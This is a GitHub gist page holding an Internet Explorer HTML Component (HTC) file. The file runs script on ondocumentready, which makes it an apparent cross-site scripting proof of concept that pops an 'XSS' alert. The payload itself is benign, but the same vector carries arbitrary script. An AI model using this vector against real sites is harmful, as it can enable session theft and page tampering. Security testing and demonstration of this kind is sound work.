Skip to content

Instantly share code, notes, and snippets.

@kokx
Created December 30, 2010 01:56
Show Gist options
  • Select an option

  • Save kokx/759354 to your computer and use it in GitHub Desktop.

Select an option

Save kokx/759354 to your computer and use it in GitHub Desktop.
<PUBLIC:COMPONENT TAGNAME="xss">
<PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main()
{
alert("XSS");
}
</SCRIPT>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment